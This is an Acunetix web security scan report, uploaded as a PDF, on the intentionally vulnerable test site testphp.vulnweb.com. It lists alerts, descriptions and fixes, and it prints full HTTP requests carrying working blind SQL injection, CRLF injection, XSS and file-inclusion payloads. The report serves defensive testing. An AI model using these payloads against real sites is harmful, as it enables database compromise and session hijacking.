Developer Example | PDF | Http Cookie | Microsoft Sql Server

Developer Example

The document summarizes the results of a web security scan on http://testphp.vulnweb.com. It found 127 total alerts, including 51 high severity issues. Specifically, it detected blind SQL injection vulnerabilities in several files accepting user inputs, which could allow attackers to compromise the backend database or deface the website. The report provides technical details on each vulnerability found and recommends fixes.

Uploaded by

hardiron
Copyright
© Attribution Non-Commercial (BY-NC)

Web Security Scan 10 November, 2013

Developer Report

Scan of http://testphp.vulnweb.com
Scan details
Scan information
- Start time: 10-11-2013 17:16:39
- Finish time: 10-11-2013 17:21:46
- Scan time: 5 minutes, 7 seconds
- Profile: Default

Server information
- Responsive: True
- Server banner: nginx/1.4.1
- Server OS: Unknown
- Server technologies: PHP

Threat level
Acunetix Threat Level 3: One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these vulnerabilities and compromise the backend database and/or deface your website.

Alerts distribution
- Total alerts found: 127
- High: 51
- Medium: 40
- Low: 9
- Informational: 27

Knowledge base
List of file extensions
File extensions can provide information on what technologies are being used on this website. List of file extensions detected:
- php => 27 file(s)
- css => 3 file(s)
- swf => 1 file(s)
- fla => 1 file(s)
- htaccess => 1 file(s)
- xml => 7 file(s)
- tn => 8 file(s)
- LOG => 1 file(s)
- bak => 2 file(s)
- txt => 2 file(s)
- html => 2 file(s)
- iml => 1 file(s)
- sql => 1 file(s)
- Log => 1 file(s)

List of client scripts
These files contain JavaScript code referenced from the website.
websecurityscan.eu

- /medias/js/common_functions.js

List of files with inputs
These files have at least one input (GET or POST).
- /search.php - 1 inputs
- /hpp - 1 inputs
- /hpp/params.php - 2 inputs
- /cart.php - 1 inputs
- /artists.php - 1 inputs
- /userinfo.php - 1 inputs
- /guestbook.php - 1 inputs
- /AJAX/infoartist.php - 1 inputs
- /AJAX/infocateg.php - 1 inputs
- /AJAX/infotitle.php - 1 inputs
- /AJAX/showxml.php - 1 inputs
- /product.php - 1 inputs
- /showimage.php - 2 inputs
- /listproducts.php - 2 inputs
- /redir.php - 1 inputs
- /secured/newuser.php - 1 inputs
- /comment.php - 3 inputs

List of external hosts
These hosts were linked from this website but they were not scanned because they are not listed in the list of hosts allowed (Settings -> Scanner settings -> Scanner -> List of hosts allowed).
- www.acunetix.com
- www.eclectasy.com
- download.macromedia.com
- blog.mindedsecurity.com

List of email addresses
List of all email addresses found on this host.
- wasp@acunetix.com
- wvs@acunetix.com

Alerts summary
Blind SQL Injection
Affects:
- /AJAX/infoartist.php - 1 variation(s)
- /AJAX/infocateg.php - 1 variation(s)
- /AJAX/infotitle.php - 1 variation(s)
- /artists.php - 1 variation(s)
- /listproducts.php - 2 variation(s)
- /product.php - 1 variation(s)
- /search.php - 2 variation(s)
- /secured/newuser.php - 1 variation(s)
- /userinfo.php - 2 variation(s)

CRLF injection/HTTP response splitting
Affects:
- /redir.php - 1 variation(s)

Cross site scripting
Affects:
- /showimage.php - 2 variation(s)

Cross site scripting (verified)
Affects:
- /comment.php - 1 variation(s)
- /guestbook.php - 2 variation(s)
- /hpp/ - 3 variation(s)
- /hpp/params.php - 2 variation(s)
- /listproducts.php - 2 variation(s)
- /search.php - 1 variation(s)
- /secured/newuser.php - 6 variation(s)

File inclusion
Affects:
- /showimage.php - 2 variation(s)

HTTP parameter pollution
Affects:
- /hpp/ - 1 variation(s)

PHP allow_url_fopen enabled
Affects:
- /secured/phpinfo.php - 1 variation(s)

Script source code disclosure
Affects:
- /showimage.php - 1 variation(s)

Server side request forgery
Affects:
- /showimage.php - 2 variation(s)

SQL injection
Affects:
- /AJAX/infoartist.php - 1 variation(s)
- /AJAX/infocateg.php - 1 variation(s)
- /AJAX/infotitle.php - 1 variation(s)
- /artists.php - 1 variation(s)
- /product.php - 1 variation(s)
- /search.php - 1 variation(s)
- /userinfo.php - 2 variation(s)

SQL injection (verified)
Affects:
- /listproducts.php - 2 variation(s)
- /secured/newuser.php - 1 variation(s)

Weak password
Affects:
- /userinfo.php - 1 variation(s)

.htaccess file readable
Affects:
- /Mod_Rewrite_Shop - 1 variation(s)

Application error message
Affects:
- /listproducts.php - 4 variation(s)
- /secured/newuser.php - 2 variation(s)
- /showimage.php - 3 variation(s)

Backup files
Affects:
- /index.bak - 1 variation(s)
- /index.zip - 1 variation(s)

Directory listing
Affects:
- /.idea - 1 variation(s)
- /.idea/scopes - 1 variation(s)
- /admin - 1 variation(s)
- /CVS - 1 variation(s)
- /Flash - 1 variation(s)
- /images - 1 variation(s)
- /Mod_Rewrite_Shop/images - 1 variation(s)
- /pictures - 1 variation(s)
- /Templates - 1 variation(s)

Error message on page
Affects:
- /pictures/path-disclosure-unix.html - 1 variation(s)

HTML form without CSRF protection
Affects:
- / - 1 variation(s)
- /comment.php - 1 variation(s)
- /guestbook.php - 1 variation(s)
- /hpp (914f51fea3c42cbd541a6953a8b115a4) - 1 variation(s)
- /login.php - 1 variation(s)
- /signup.php - 1 variation(s)

Insecure crossdomain.xml file
Affects:
- Web Server - 2 variation(s)

JetBrains .idea project directory
Affects:
- / - 1 variation(s)

PHP errors enabled
Affects:
- /secured/phpinfo.php - 1 variation(s)

PHP open_basedir is not set
Affects:
- /secured/phpinfo.php - 1 variation(s)

PHPinfo page found
Affects:
- /secured/phpinfo.php - 1 variation(s)

Source code disclosure
Affects:
- /index.bak - 1 variation(s)
- /pictures/wp-config.bak - 1 variation(s)

URL redirection
Affects:
- /redir.php - 1 variation(s)

User credentials are sent in clear text
Affects:
- /login.php - 1 variation(s)
- /signup.php - 1 variation(s)

WS_FTP log file found
Affects:
- /pictures//WS_FTP.LOG - 1 variation(s)

Clickjacking: X-Frame-Options header missing
Affects:
- Web Server - 1 variation(s)

Hidden form input named price was found
Affects:
- /product.php (21bc3e21f408d9fb4afa8f6848e81f57) - 1 variation(s)

Login page password-guessing attack
Affects:
- /userinfo.php - 1 variation(s)

Possible sensitive directories
Affects:
- /admin - 1 variation(s)
- /CVS - 1 variation(s)
- /secured - 1 variation(s)

Possible sensitive files
Affects:
- /hpp/test.php - 1 variation(s)
- /Mod_Rewrite_Shop/.htaccess - 1 variation(s)

Possible virtual host found
Affects:
- localhost - 1 variation(s)

Broken links
Affects:
- /medias/css/main.css - 1 variation(s)
- /medias/js/common_functions.js - 1 variation(s)
- /Mod_Rewrite_Shop/Details/color-printer/3 - 1 variation(s)
- /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 - 1 variation(s)
- /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 - 1 variation(s)
- /privacy.php - 1 variation(s)

Email address found
Affects:
- / - 1 variation(s)
- /artists.php - 1 variation(s)
- /cart.php - 1 variation(s)
- /categories.php - 1 variation(s)
- /disclaimer.php - 1 variation(s)
- /guestbook.php - 1 variation(s)
- /index.bak - 1 variation(s)
- /index.php - 1 variation(s)
- /listproducts.php - 1 variation(s)
- /login.php - 1 variation(s)
- /product.php - 1 variation(s)
- /search.php - 1 variation(s)
- /signup.php - 1 variation(s)
- /Templates/main_dynamic_template.dwt.php - 1 variation(s)

GHDB: Sablotron error message
Affects:
- /pictures/path-disclosure-unix.html - 1 variation(s)

Password type input with auto-complete enabled
Affects:
- /login.php - 1 variation(s)
- /signup.php - 2 variation(s)

Possible internal IP address disclosure
Affects:
- /pictures/ipaddresses.txt - 1 variation(s)

Possible server path disclosure (Unix)
Affects:
- /pictures/path-disclosure-unix.html - 1 variation(s)

Possible username or password disclosure
Affects:
- /pictures/credentials.txt - 1 variation(s)

Alert details
Blind SQL Injection
Severity: High
Type: Validation
Reported by module: Scripting (Blind_Sql_Injection.script)

Description
This script is possibly vulnerable to SQL Injection attacks. SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when a web application accepts user input that is placed directly into a SQL statement without properly filtering out dangerous characters. This is one of the most common application-layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, a large number of web applications remain vulnerable.

Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible not only to manipulate existing queries, but to UNION in arbitrary data, use sub-selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system. Certain SQL servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.

Recommendation
Your script should filter metacharacters from user input. Check detailed information for more information about fixing this vulnerability.

References
- SQL Injection Walkthrough
- OWASP PHP Top 5
- How to check for SQL injection vulnerabilities
- OWASP Injection Flaws
- VIDEO: SQL Injection tutorial
- Acunetix SQL Injection Attack

Affected items

/AJAX/infoartist.php
Details: URL encoded GET input id was set to 3 AND 3*2*1=6 AND 403=403
Tests performed:
- 0+0+0+3 => TRUE
- 0+403*398+3 => FALSE
- 13-5-2-999 => FALSE
- 13-5-2-3 => TRUE
- 13-2*5+0+0+1-1 => TRUE
- 13-2*6+0+0+1-1 => FALSE
- 3 AND 2+1-1-1=1 AND 403=403 => TRUE
- 3 AND 3+1-1-1=1 AND 403=403 => FALSE[/ ... (line truncated)
Request headers:
GET /AJAX/infoartist.php?id=3%20AND%203*2*1%3d6%20AND%20403%3d403 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/AJAX/infocateg.php
Details: URL encoded GET input id was set to 4 AND 3*2*1=6 AND 602=602
Tests performed:
- 0+0+0+4 => TRUE
- 0+602*597+4 => FALSE
- 14-5-2-999 => FALSE
- 14-5-2-3 => TRUE
- 14-2*5+0+0+1-1 => TRUE
- 14-2*6+0+0+1-1 => FALSE
- 4 AND 2+1-1-1=1 AND 602=602 => TRUE
- 4 AND 3+1-1-1=1 AND 602=602 => FALSE[/ ... (line truncated)
Request headers:
GET /AJAX/infocateg.php?id=4%20AND%203*2*1%3d6%20AND%20602%3d602 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/AJAX/infotitle.php
Details: URL encoded POST input id was set to 7 AND 3*2*1=6 AND 54=54
Tests performed:
- 0+0+0+7 => TRUE
- 0+54*49+7 => FALSE
- 17-5-2-999 => FALSE
- 17-5-2-3 => TRUE
- 17-2*5+0+0+1-1 => TRUE
- 17-2*6+0+0+1-1 => FALSE
- 7 AND 2+1-1-1=1 AND 54=54 => TRUE
- 7 AND 3+1-1-1=1 AND 54=54 => FALSE[/ ... (line truncated)
Request headers:
POST /AJAX/infotitle.php HTTP/1.1
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

id=7%20AND%203*2*1%3d6%20AND%2054%3d54


/artists.php
Details: URL encoded GET input artist was set to 3 AND 3*2*1=6 AND 276=276
Tests performed:
- 0+0+0+3 => TRUE
- 0+276*271+3 => FALSE
- 13-5-2-999 => FALSE
- 13-5-2-3 => TRUE
- 13-2*5+0+0+1-1 => TRUE
- 13-2*6+0+0+1-1 => FALSE
- 3 AND 2+1-1-1=1 AND 276=276 => TRUE
- 3 AND 3+1-1-1=1 AND 276=276 => FAL ... (line truncated)
Request headers:
GET /artists.php?artist=3%20AND%203*2*1%3d6%20AND%20276%3d276 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/listproducts.php
Details: URL encoded GET input artist was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
Tests performed:
- if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 6.022 s
- if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ ... (line truncated)
Request headers:
GET /listproducts.php?artist=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/listproducts.php
Details: URL encoded GET input cat was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
Tests performed:
- if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 6.006 s
- if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ => ... (line truncated)
Request headers:
GET /listproducts.php?cat=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/product.php
Details: URL encoded GET input pic was set to 4 AND 3*2*1=6 AND 399=399
Tests performed:
- 0+0+0+4 => TRUE
- 0+399*394+4 => FALSE
- 14-5-2-999 => FALSE
- 14-5-2-3 => TRUE
- 14-2*5+0+0+1-1 => TRUE
- 14-2*6+0+0+1-1 => FALSE
- 4 AND 2+1-1-1=1 AND 399=399 => TRUE
- 4 AND 3+1-1-1=1 AND 399=399 => FALSE[ ... (line truncated)
Request headers:
GET /product.php?pic=4%20AND%203*2*1%3d6%20AND%20399%3d399 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/search.php
Details: URL encoded POST input searchFor was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
Tests performed:
- if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 6.022 s
- if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))O ... (line truncated)
Request headers:
POST /search.php?test=query HTTP/1.1
Content-Length: 156
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

goButton=go&searchFor=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/

/search.php
Details: URL encoded GET input test was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
Tests performed:
- (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ => 3.011 s
- (select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v) ... (line truncated)
Request headers:
POST /search.php?test=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/ HTTP/1.1
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

goButton=go&searchFor=

/secured/newuser.php
Details: URL encoded POST input uuname was set to -1' OR 3*2*1=6 AND 000858=000858 --
Tests performed:
- -1' OR 2+858-858-1=0+0+0+1 -- => TRUE
- -1' OR 3+858-858-1=0+0+0+1 -- => FALSE
- -1' OR 3*2<(0+5+858-858) -- => FALSE
- -1' OR 3*2>(0+5+858-858) -- => FALSE
- -1' OR 2+1-1-1=1 AND 000858=000858 -- => TRUE
- -1' OR 000858=000858 AND ... (line truncated)
Request headers:
POST /secured/newuser.php HTTP/1.1
Content-Length: 235
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=pjxopdtk&uuname=-1'%20OR%203*2*1%3d6%20AND%20000858%3d000858%20--%20

/userinfo.php
Details: URL encoded POST input pass was set to -1' OR 3*2*1=6 AND 000389=000389 --
Tests performed:
- -1' OR 2+389-389-1=0+0+0+1 -- => TRUE
- -1' OR 3+389-389-1=0+0+0+1 -- => FALSE
- -1' OR 3*2<(0+5+389-389) -- => FALSE
- -1' OR 3*2>(0+5+389-389) -- => FALSE
- -1' OR 2+1-1-1=1 AND 000389=000389 -- => TRUE
- -1' OR 000389=000389 AND 3+ ... (line truncated)
Request headers:
POST /userinfo.php HTTP/1.1
Content-Length: 72
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

pass=-1'%20OR%203*2*1%3d6%20AND%20000389%3d000389%20--%20&uname=uinwgjiq


/userinfo.php
Details: URL encoded POST input uname was set to -1' OR 3*2*1=6 AND 000821=000821 --
Tests performed:
- -1' OR 2+821-821-1=0+0+0+1 -- => TRUE
- -1' OR 3+821-821-1=0+0+0+1 -- => FALSE
- -1' OR 3*2<(0+5+821-821) -- => FALSE
- -1' OR 3*2>(0+5+821-821) -- => FALSE
- -1' OR 2+1-1-1=1 AND 000821=000821 -- => TRUE
- -1' OR 000821=000821 AND 3 ... (line truncated)
Request headers:
POST /userinfo.php HTTP/1.1
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

pass=g00dPa%24%24w0rD&uname=-1'%20OR%203*2*1%3d6%20AND%20000821%3d000821%20--%20


CRLF injection/HTTP response splitting


Severity: High
Type: Validation
Reported by module: Scripting (CRLF_Injection.script)

Description
This script is possibly vulnerable to CRLF injection attacks. HTTP headers have the structure "Key: Value", where each line is separated by the CRLF combination. If user input is injected into the value section without properly escaping or removing CRLF characters, it is possible to alter the structure of the HTTP headers. HTTP Response Splitting is a new application attack technique which enables various new attacks such as web cache poisoning, cross-user defacement, hijacking pages with sensitive user information and cross-site scripting (XSS). The attacker sends a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one.

Impact
It is possible for a remote attacker to inject custom HTTP headers. For example, an attacker can inject session cookies or HTML code. This may lead to vulnerabilities such as XSS (cross-site scripting) or session fixation.

Recommendation
You need to restrict CR (0x13) and LF (0x10) from the user input or properly encode the output in order to prevent the injection of custom HTTP headers.

References
- Introduction to HTTP Response Splitting
- Acunetix CRLF Injection Attack
- Whitepaper - HTTP Response Splitting

Affected items

/redir.php
Details: URL encoded GET input r was set to SomeCustomInjectedHeader:injected_by_wvs
Injected header found: SomeCustomInjectedHeader: injected_by_wvs
Request headers:
GET /redir.php?r=%0d%0a%20SomeCustomInjectedHeader:injected_by_wvs HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Cross site scripting


Severity: High
Type: Validation
Reported by module: Scripting (Remote_File_Inclusion_XSS.script)

Description
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know whether the script should be trusted, it executes the script in the user's context, allowing the attacker to access any cookies or session tokens retained by the browser.

Impact
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

Recommendation
Your script should filter metacharacters from user input.

References
- How To: Prevent Cross-Site Scripting in ASP.NET
- Acunetix Cross Site Scripting Attack
- VIDEO: How Cross-Site Scripting (XSS) Works
- The Cross Site Scripting Faq
- OWASP Cross Site Scripting
- XSS Annihilation
- XSS Filter Evasion Cheat Sheet
- Cross site scripting
- OWASP PHP Top 5

Affected items

/showimage.php
Details: URL encoded GET input file was set to http://testasp.vulnweb.com/t/xss.html?%00.jpg
Request headers:
GET /showimage.php?file=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/showimage.php
Details: URL encoded GET input file was set to http://testasp.vulnweb.com/t/xss.html?%00.jpg
Request headers:
GET /showimage.php?file=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Cross site scripting (verified)


Severity: High
Type: Validation
Reported by module: Scripting (XSS.script)

Description
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know whether the script should be trusted, it executes the script in the user's context, allowing the attacker to access any cookies or session tokens retained by the browser.

Impact
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

Recommendation
Your script should filter metacharacters from user input.

References
- Cross site scripting
- OWASP PHP Top 5
- XSS Filter Evasion Cheat Sheet
- XSS Annihilation
- The Cross Site Scripting Faq
- Acunetix Cross Site Scripting Attack
- VIDEO: How Cross-Site Scripting (XSS) Works
- OWASP Cross Site Scripting
- How To: Prevent Cross-Site Scripting in ASP.NET

Affected items

/comment.php
Details: URL encoded POST input name was set to <your%20name%20here>'"()&%<ScRiPt >prompt(932125)</ScRiPt>
Request headers:
POST /comment.php HTTP/1.1
Content-Length: 139
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

comment=1&name=<your%2520name%2520here>'%22()%26%25<ScRiPt%20>prompt(932125)</ScRiPt>&phpaction=echo%20%24_POST%5bcomment%5d;&Submit=Submit

/guestbook.php
Details: URL encoded POST input name was set to anonymous%20user'"()&%<ScRiPt >prompt(937333)</ScRiPt>
Request headers:
POST /guestbook.php HTTP/1.1
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

name=anonymous%2520user'%22()%26%25<ScRiPt%20>prompt(937333)</ScRiPt>&submit=add%20message&text=1

/guestbook.php
Details: URL encoded POST input text was set to 1'"()&%<ScRiPt >prompt(997862)</ScRiPt>
Request headers:
POST /guestbook.php HTTP/1.1
Content-Length: 95
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

name=anonymous%20user&submit=add%20message&text=1'%22()%26%25<ScRiPt%20>prompt(997862)</ScRiPt>

/hpp/
Details: URL encoded GET input pp was set to 12" onmouseover=prompt(931944) bad="
The input is reflected inside a tag parameter between double quotes.
Request headers:
GET /hpp/?pp=12%22%20onmouseover%3dprompt(931944)%20bad%3d%22 HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/hpp/
Details: URL encoded GET input pp was set to 12" onmouseover=prompt(981161) bad="
The input is reflected inside a tag parameter between double quotes.
Request headers:
GET /hpp/?pp=12%22%20onmouseover%3dprompt(981161)%20bad%3d%22 HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/hpp/
Details: URL encoded GET input pp was set to 12" onmouseover=prompt(919966) bad="
The input is reflected inside a tag parameter between double quotes.
Request headers:
GET /hpp/?pp=12%22%20onmouseover%3dprompt(919966)%20bad%3d%22 HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com


Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/hpp/params.php
Details: URL encoded GET input p was set to valid'"()&%<ScRiPt >prompt(962710)</ScRiPt>
Request headers:
GET /hpp/params.php?p=valid'%22()%26%25<ScRiPt%20>prompt(962710)</ScRiPt>&pp=12 HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/hpp/params.php
Details: URL encoded GET input pp was set to 12'"()&%<ScRiPt >prompt(934293)</ScRiPt>
Request headers:
GET /hpp/params.php?p=valid&pp=12'%22()%26%25<ScRiPt%20>prompt(934293)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/listproducts.php
Details: URL encoded GET input artist was set to 3'"()&%<ScRiPt >prompt(961759)</ScRiPt>
Request headers:
GET /listproducts.php?artist=3'%22()%26%25<ScRiPt%20>prompt(961759)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/listproducts.php
Details: URL encoded GET input cat was set to 4'"()&%<ScRiPt >prompt(979126)</ScRiPt>
Request headers:
GET /listproducts.php?cat=4'%22()%26%25<ScRiPt%20>prompt(979126)</ScRiPt> HTTP/1.1
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/search.php
Details: URL encoded POST input searchFor was set to 1'"()&%<ScRiPt >prompt(970931)</ScRiPt>
Request headers:
POST /search.php?test=query HTTP/1.1
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
